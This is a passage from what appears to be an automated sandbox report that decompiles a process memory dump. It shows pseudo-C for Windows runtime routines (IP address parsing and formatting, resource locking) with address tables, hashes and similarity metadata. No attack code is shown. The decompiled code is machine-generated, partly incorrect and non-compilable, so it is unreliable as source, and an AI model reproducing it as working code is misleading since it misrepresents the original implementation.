					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02008980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01FFDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02030CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02030CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E020306BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E020306BA(_t135, _t178) == 0 || E02030A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) { // 0x3a is ':'
									if(_t141 == 0x2e) { // 0x2e is '.'
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d; // NTSTATUS STATUS_INVALID_PARAMETER
												}
												_t132 = E02030CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02030CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) { // 0x3a is ':'
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E020306BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E020306BA(_t124, _t142) == 0 || E02030A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
                                                                                                                                                                					goto L8;
                                                                                                                                                                				}
                                                                                                                                                                				_t128 = 1;
                                                                                                                                                                				goto L39;
                                                                                                                                                                			}

























                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030c60
                                                                                                                                                                0x02030afb
                                                                                                                                                                0x02030afe
                                                                                                                                                                0x02030b02
                                                                                                                                                                0x02030b05
                                                                                                                                                                0x02030b08
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030b08
                                                                                                                                                                0x02030ae6
                                                                                                                                                                0x02030b44
                                                                                                                                                                0x020309f8
                                                                                                                                                                0x020309f8
                                                                                                                                                                0x020309f9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eaa0
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fassign
                                                                                                                                                                • String ID: .$:$:
                                                                                                                                                                • API String ID: 3965848254-2308638275
                                                                                                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction ID: 6e415029d22b1e3c99dedefabc2aad0345435b35adb30ce957f4d60b26fb25a5
                                                                                                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                • Instruction Fuzzy Hash: 09A1AB7191230AEEDF26CF64C8446EEBBBEAF05309F24846AD842A7281D7319645EB51
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                			E02030554(signed int _a4, char _a8) {
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int* _t49;
                                                                                                                                                                				signed int _t51;
                                                                                                                                                                				signed int _t56;
                                                                                                                                                                				signed int _t58;
                                                                                                                                                                				signed int _t61;
                                                                                                                                                                				signed int _t63;
                                                                                                                                                                				void* _t66;
                                                                                                                                                                				intOrPtr _t67;
                                                                                                                                                                				void* _t69;
                                                                                                                                                                				signed int _t70;
                                                                                                                                                                				void* _t75;
                                                                                                                                                                				signed int _t81;
                                                                                                                                                                				signed int _t84;
                                                                                                                                                                				void* _t86;
                                                                                                                                                                				signed int _t93;
                                                                                                                                                                				signed int _t96;
                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                				signed int _t107;
                                                                                                                                                                				void* _t110;
                                                                                                                                                                				signed int _t115;
                                                                                                                                                                				signed int* _t119;
                                                                                                                                                                				void* _t125;
                                                                                                                                                                				void* _t126;
                                                                                                                                                                				signed int _t128;
                                                                                                                                                                				signed int _t130;
                                                                                                                                                                				signed int _t138;
                                                                                                                                                                				signed int _t144;
                                                                                                                                                                				void* _t158;
                                                                                                                                                                				void* _t159;
                                                                                                                                                                				void* _t160;
                                                                                                                                                                
                                                                                                                                                                				_t96 = _a4;
                                                                                                                                                                				_t115 =  *(_t96 + 0x28);
                                                                                                                                                                				_push(_t138);
                                                                                                                                                                				if(_t115 < 0) {
                                                                                                                                                                					_t105 =  *[fs:0x18];
                                                                                                                                                                					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                                					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                                						goto L6;
                                                                                                                                                                					} else {
                                                                                                                                                                						__eflags = _t115 | 0xffffffff;
                                                                                                                                                                						asm("lock xadd [eax], edx");
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				} else {
                                                                                                                                                                					L6:
                                                                                                                                                                					_push(_t128);
                                                                                                                                                                					while(1) {
                                                                                                                                                                						L7:
                                                                                                                                                                						__eflags = _t115;
                                                                                                                                                                						if(_t115 >= 0) {
                                                                                                                                                                							break;
                                                                                                                                                                						}
                                                                                                                                                                						__eflags = _a8;
                                                                                                                                                                						if(_a8 == 0) {
                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                							return 0;
                                                                                                                                                                						} else {
                                                                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                							_t49 = _t96 + 0x1c;
                                                                                                                                                                							_t106 = 1;
                                                                                                                                                                							asm("lock xadd [edx], ecx");
                                                                                                                                                                							_t115 =  *(_t96 + 0x28);
                                                                                                                                                                							__eflags = _t115;
                                                                                                                                                                							if(_t115 < 0) {
                                                                                                                                                                								L23:
                                                                                                                                                                								_t130 = 0;
                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                								while(1) {
                                                                                                                                                                									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                									asm("sbb esi, esi");
                                                                                                                                                                									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020d01c0;
                                                                                                                                                                									_push(_t144);
                                                                                                                                                                									_push(0);
                                                                                                                                                                									_t51 = E01FEF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                                									__eflags = _t51 - 0x102;
                                                                                                                                                                									if(_t51 != 0x102) {
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									_t106 =  *(_t144 + 4);
                                                                                                                                                                									_t126 =  *_t144;
                                                                                                                                                                									_t86 = E02034FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                                									_push(_t126);
                                                                                                                                                                									_push(_t86);
                                                                                                                                                                									E02043F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                                									E02043F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                									_t130 = _t130 + 1;
                                                                                                                                                                									_t160 = _t158 + 0x28;
                                                                                                                                                                									__eflags = _t130 - 2;
                                                                                                                                                                									if(__eflags > 0) {
                                                                                                                                                                										E0207217A(_t106, __eflags, _t96);
                                                                                                                                                                									}
                                                                                                                                                                									_push("RTL: Re-Waiting\n");
                                                                                                                                                                									_push(0);
                                                                                                                                                                									_push(0x65);
                                                                                                                                                                									E02043F92();
                                                                                                                                                                									_t158 = _t160 + 0xc;
                                                                                                                                                                								}
                                                                                                                                                                								__eflags = _t51;
                                                                                                                                                                								if(__eflags < 0) {
                                                                                                                                                                									_push(_t51);
                                                                                                                                                                									E02033915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                                									asm("int3");
                                                                                                                                                                									while(1) {
                                                                                                                                                                										L32:
                                                                                                                                                                										__eflags = _a8;
                                                                                                                                                                										if(_a8 == 0) {
                                                                                                                                                                											break;
                                                                                                                                                                										}
                                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                										_t119 = _t96 + 0x24;
                                                                                                                                                                										_t107 = 1;
                                                                                                                                                                										asm("lock xadd [eax], ecx");
                                                                                                                                                                										_t56 =  *(_t96 + 0x28);
                                                                                                                                                                										_a4 = _t56;
                                                                                                                                                                										__eflags = _t56;
                                                                                                                                                                										if(_t56 != 0) {
                                                                                                                                                                											L40:
                                                                                                                                                                											_t128 = 0;
                                                                                                                                                                											__eflags = 0;
                                                                                                                                                                											while(1) {
                                                                                                                                                                												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                												asm("sbb esi, esi");
                                                                                                                                                                												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020d01c0;
                                                                                                                                                                												_push(_t138);
                                                                                                                                                                												_push(0);
                                                                                                                                                                												_t58 = E01FEF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                                												__eflags = _t58 - 0x102;
                                                                                                                                                                												if(_t58 != 0x102) {
                                                                                                                                                                													break;
                                                                                                                                                                												}
                                                                                                                                                                												_t107 =  *(_t138 + 4);
                                                                                                                                                                												_t125 =  *_t138;
                                                                                                                                                                												_t75 = E02034FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                                												_push(_t125);
                                                                                                                                                                												_push(_t75);
                                                                                                                                                                												E02043F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                                												E02043F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                												_t128 = _t128 + 1;
                                                                                                                                                                												_t159 = _t158 + 0x28;
                                                                                                                                                                												__eflags = _t128 - 2;
                                                                                                                                                                												if(__eflags > 0) {
                                                                                                                                                                													E0207217A(_t107, __eflags, _t96);
                                                                                                                                                                												}
                                                                                                                                                                												_push("RTL: Re-Waiting\n");
                                                                                                                                                                												_push(0);
                                                                                                                                                                												_push(0x65);
                                                                                                                                                                												E02043F92();
                                                                                                                                                                												_t158 = _t159 + 0xc;
                                                                                                                                                                											}
                                                                                                                                                                											__eflags = _t58;
                                                                                                                                                                											if(__eflags < 0) {
                                                                                                                                                                												_push(_t58);
                                                                                                                                                                												E02033915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                                												asm("int3");
                                                                                                                                                                												_t61 =  *_t107;
                                                                                                                                                                												 *_t107 = 0;
                                                                                                                                                                												__eflags = _t61;
                                                                                                                                                                												if(_t61 == 0) {
                                                                                                                                                                													L1:
                                                                                                                                                                													_t63 = E02015384(_t138 + 0x24);
                                                                                                                                                                													if(_t63 != 0) {
                                                                                                                                                                														goto L52;
                                                                                                                                                                													} else {
                                                                                                                                                                														goto L2;
                                                                                                                                                                													}
                                                                                                                                                                												} else {
                                                                                                                                                                													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                                													_push( &_a4);
                                                                                                                                                                													_push(_t61);
                                                                                                                                                                													_t70 = E01FEF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                                													__eflags = _t70;
                                                                                                                                                                													if(__eflags >= 0) {
                                                                                                                                                                														goto L1;
                                                                                                                                                                													} else {
                                                                                                                                                                														_push(_t70);
                                                                                                                                                                														E02033915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                                														L52:
                                                                                                                                                                														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                														_push( &_a4);
                                                                                                                                                                														_push(1);
                                                                                                                                                                														_t63 = E01FEF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                														__eflags = _t63;
                                                                                                                                                                														if(__eflags >= 0) {
                                                                                                                                                                															L2:
                                                                                                                                                                															return _t63;
                                                                                                                                                                														} else {
                                                                                                                                                                															_push(_t63);
                                                                                                                                                                															E02033915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                                															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                															_push( &_a4);
                                                                                                                                                                															_push(1);
                                                                                                                                                                															_t63 = E01FEF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                															__eflags = _t63;
                                                                                                                                                                															if(__eflags >= 0) {
                                                                                                                                                                																goto L2;
                                                                                                                                                                															} else {
                                                                                                                                                                																_push(_t63);
                                                                                                                                                                																_t66 = E02033915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                                																asm("int3");
                                                                                                                                                                																while(1) {
                                                                                                                                                                																	_t110 = _t66;
                                                                                                                                                                																	__eflags = _t66 - 1;
                                                                                                                                                                																	if(_t66 != 1) {
                                                                                                                                                                																		break;
                                                                                                                                                                																	}
                                                                                                                                                                																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                                																	_t66 = _t110;
                                                                                                                                                                																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                																	__eflags = _t66 - _t110;
                                                                                                                                                                																	if(_t66 != _t110) {
                                                                                                                                                                																		continue;
                                                                                                                                                                																	} else {
                                                                                                                                                                																		_t67 =  *[fs:0x18];
                                                                                                                                                                																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                                																		return _t67;
                                                                                                                                                                																	}
                                                                                                                                                                																	goto L59;
                                                                                                                                                                																}
                                                                                                                                                                																E02015329(_t110, _t138);
                                                                                                                                                                																_t69 = E020153A5(_t138, 1);
                                                                                                                                                                																return _t69;
                                                                                                                                                                															}
                                                                                                                                                                														}
                                                                                                                                                                													}
                                                                                                                                                                												}
                                                                                                                                                                											} else {
                                                                                                                                                                												_t56 =  *(_t96 + 0x28);
                                                                                                                                                                												goto L3;
                                                                                                                                                                											}
                                                                                                                                                                										} else {
                                                                                                                                                                											_t107 =  *_t119;
                                                                                                                                                                											__eflags = _t107;
                                                                                                                                                                											if(__eflags > 0) {
                                                                                                                                                                												while(1) {
                                                                                                                                                                													_t81 = _t107;
                                                                                                                                                                													asm("lock cmpxchg [edi], esi");
                                                                                                                                                                													__eflags = _t81 - _t107;
                                                                                                                                                                													if(_t81 == _t107) {
                                                                                                                                                                														break;
                                                                                                                                                                													}
                                                                                                                                                                													_t107 = _t81;
                                                                                                                                                                													__eflags = _t81;
                                                                                                                                                                													if(_t81 > 0) {
                                                                                                                                                                														continue;
                                                                                                                                                                													}
                                                                                                                                                                													break;
                                                                                                                                                                												}
                                                                                                                                                                												_t56 = _a4;
                                                                                                                                                                												__eflags = _t107;
                                                                                                                                                                											}
                                                                                                                                                                											if(__eflags != 0) {
                                                                                                                                                                												while(1) {
                                                                                                                                                                													L3:
                                                                                                                                                                													__eflags = _t56;
                                                                                                                                                                													if(_t56 != 0) {
                                                                                                                                                                														goto L32;
                                                                                                                                                                													}
                                                                                                                                                                													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                													_t56 = 0;
                                                                                                                                                                													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                													__eflags = 0;
                                                                                                                                                                													if(0 != 0) {
                                                                                                                                                                														continue;
                                                                                                                                                                													} else {
                                                                                                                                                                														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                														return 1;
                                                                                                                                                                													}
                                                                                                                                                                													goto L59;
                                                                                                                                                                												}
                                                                                                                                                                												continue;
                                                                                                                                                                											} else {
                                                                                                                                                                												goto L40;
                                                                                                                                                                											}
                                                                                                                                                                										}
                                                                                                                                                                										goto L59;
                                                                                                                                                                									}
                                                                                                                                                                									__eflags = 0;
                                                                                                                                                                									return 0;
                                                                                                                                                                								} else {
                                                                                                                                                                									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                									continue;
                                                                                                                                                                								}
                                                                                                                                                                							} else {
                                                                                                                                                                								_t106 =  *_t49;
                                                                                                                                                                								__eflags = _t106;
                                                                                                                                                                								if(__eflags > 0) {
                                                                                                                                                                									while(1) {
                                                                                                                                                                										_t93 = _t106;
                                                                                                                                                                										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                										__eflags = _t93 - _t106;
                                                                                                                                                                										if(_t93 == _t106) {
                                                                                                                                                                											break;
                                                                                                                                                                										}
                                                                                                                                                                										_t106 = _t93;
                                                                                                                                                                										__eflags = _t93;
                                                                                                                                                                										if(_t93 > 0) {
                                                                                                                                                                											continue;
                                                                                                                                                                										}
                                                                                                                                                                										break;
                                                                                                                                                                									}
                                                                                                                                                                									__eflags = _t106;
                                                                                                                                                                								}
                                                                                                                                                                								if(__eflags != 0) {
                                                                                                                                                                									continue;
                                                                                                                                                                								} else {
                                                                                                                                                                									goto L23;
                                                                                                                                                                								}
                                                                                                                                                                							}
                                                                                                                                                                						}
                                                                                                                                                                						goto L59;
                                                                                                                                                                					}
                                                                                                                                                                					_t84 = _t115;
                                                                                                                                                                					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                					__eflags = _t84 - _t115;
                                                                                                                                                                					if(_t84 != _t115) {
                                                                                                                                                                						_t115 = _t84;
                                                                                                                                                                						goto L7;
                                                                                                                                                                					} else {
                                                                                                                                                                						return 1;
                                                                                                                                                                					}
                                                                                                                                                                				}
                                                                                                                                                                				L59:
                                                                                                                                                                			}
                                                                                                                                                                0x0205239c
                                                                                                                                                                0x020523a2
                                                                                                                                                                0x020523a3
                                                                                                                                                                0x020523a6
                                                                                                                                                                0x020523ab
                                                                                                                                                                0x020523ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020523b3
                                                                                                                                                                0x020523b3
                                                                                                                                                                0x020523b4
                                                                                                                                                                0x020523b9
                                                                                                                                                                0x020523ba
                                                                                                                                                                0x020523ba
                                                                                                                                                                0x020523bc
                                                                                                                                                                0x020523bf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049153
                                                                                                                                                                0x02049158
                                                                                                                                                                0x0204915a
                                                                                                                                                                0x0204915e
                                                                                                                                                                0x02049160
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049166
                                                                                                                                                                0x02049166
                                                                                                                                                                0x02049171
                                                                                                                                                                0x02049176
                                                                                                                                                                0x02049176
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02049160
                                                                                                                                                                0x020523c6
                                                                                                                                                                0x020523ce
                                                                                                                                                                0x020523d7
                                                                                                                                                                0x020523d7
                                                                                                                                                                0x020523ad
                                                                                                                                                                0x02052390
                                                                                                                                                                0x02052373
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205233f
                                                                                                                                                                0x02052291
                                                                                                                                                                0x02052291
                                                                                                                                                                0x02052293
                                                                                                                                                                0x02052295
                                                                                                                                                                0x0205229a
                                                                                                                                                                0x020522a1
                                                                                                                                                                0x020522a3
                                                                                                                                                                0x020522a7
                                                                                                                                                                0x020522a9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522ab
                                                                                                                                                                0x020522ad
                                                                                                                                                                0x020522af
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522af
                                                                                                                                                                0x020522b1
                                                                                                                                                                0x020522b4
                                                                                                                                                                0x020522b4
                                                                                                                                                                0x020522b6
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153be
                                                                                                                                                                0x020153c0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020153cb
                                                                                                                                                                0x020153ce
                                                                                                                                                                0x020153d0
                                                                                                                                                                0x020153d4
                                                                                                                                                                0x020153d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020153d8
                                                                                                                                                                0x020153e3
                                                                                                                                                                0x020153ea
                                                                                                                                                                0x020153ea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020153d6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020522b6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205228f
                                                                                                                                                                0x02052349
                                                                                                                                                                0x0205234d
                                                                                                                                                                0x02052251
                                                                                                                                                                0x02052251
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052251
                                                                                                                                                                0x020521a4
                                                                                                                                                                0x020521a4
                                                                                                                                                                0x020521a6
                                                                                                                                                                0x020521a8
                                                                                                                                                                0x020521ac
                                                                                                                                                                0x020521b6
                                                                                                                                                                0x020521b8
                                                                                                                                                                0x020521bc
                                                                                                                                                                0x020521be
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020521c0
                                                                                                                                                                0x020521c2
                                                                                                                                                                0x020521c4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020521c4
                                                                                                                                                                0x020521c6
                                                                                                                                                                0x020521c6
                                                                                                                                                                0x020521c8
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x020521c8
                                                                                                                                                                0x020521a2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02052183
                                                                                                                                                                0x0203057b
                                                                                                                                                                0x0203057d
                                                                                                                                                                0x02030581
                                                                                                                                                                0x02030583
                                                                                                                                                                0x02052178
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02030589
                                                                                                                                                                0x0203058f
                                                                                                                                                                0x0203058f
                                                                                                                                                                0x02030583
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02052206
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                • API String ID: 885266447-4236105082
                                                                                                                                                                • Opcode ID: 895d4687850683568f7a8f2962f7e37f3b27c324fc2aee6322a6200ea15ab533
                                                                                                                                                                • Instruction ID: 2f0489f553336f94015506ea53ed8f8994e0c7bd5b3b21c79fc0d6e59895927c
                                                                                                                                                                • Opcode Fuzzy Hash: 895d4687850683568f7a8f2962f7e37f3b27c324fc2aee6322a6200ea15ab533
                                                                                                                                                                • Instruction Fuzzy Hash: 995139757003116FEB16CA19CCC0FA773EAAF94710F258269ED45DF284DA71EC419B94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E020314C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                				signed int _v8;
                                                                                                                                                                				char _v10;
                                                                                                                                                                				char _v140;
                                                                                                                                                                				void* __ebx;
                                                                                                                                                                				void* __edi;
                                                                                                                                                                				void* __esi;
                                                                                                                                                                				signed int _t24;
                                                                                                                                                                				void* _t26;
                                                                                                                                                                				signed int _t29;
                                                                                                                                                                				signed int _t34;
                                                                                                                                                                				signed int _t40;
                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                				void* _t51;
                                                                                                                                                                				intOrPtr* _t52;
                                                                                                                                                                				void* _t54;
                                                                                                                                                                				signed int _t57;
                                                                                                                                                                				void* _t58;
                                                                                                                                                                
                                                                                                                                                                				_t51 = __edx;
                                                                                                                                                                				_t24 =  *0x20d2088; // 0x776bdffd
                                                                                                                                                                				_v8 = _t24 ^ _t57;
                                                                                                                                                                				_t45 = _a16;
                                                                                                                                                                				_t53 = _a4;
                                                                                                                                                                				_t52 = _a20;
                                                                                                                                                                				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                                					L10:
                                                                                                                                                                					_t26 = 0xc000000d;
                                                                                                                                                                				} else {
                                                                                                                                                                					if(_t45 == 0) {
                                                                                                                                                                						if( *_t52 == _t45) {
                                                                                                                                                                							goto L3;
                                                                                                                                                                						} else {
                                                                                                                                                                							goto L10;
                                                                                                                                                                						}
                                                                                                                                                                					} else {
                                                                                                                                                                						L3:
                                                                                                                                                                						_t28 =  &_v140;
                                                                                                                                                                						if(_a12 != 0) {
                                                                                                                                                                							_push("[");
                                                                                                                                                                							_push(0x41);
                                                                                                                                                                							_push( &_v140);
                                                                                                                                                                							_t29 = E02027707();
                                                                                                                                                                							_t58 = _t58 + 0xc;
                                                                                                                                                                							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                                						}
                                                                                                                                                                						_t54 = E020313CB(_t53, _t28);
                                                                                                                                                                						if(_a8 != 0) {
                                                                                                                                                                							_t34 = E02027707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                                							_t58 = _t58 + 0x10;
                                                                                                                                                                							_t54 = _t54 + _t34 * 2;
                                                                                                                                                                						}
                                                                                                                                                                						if(_a12 != 0) {
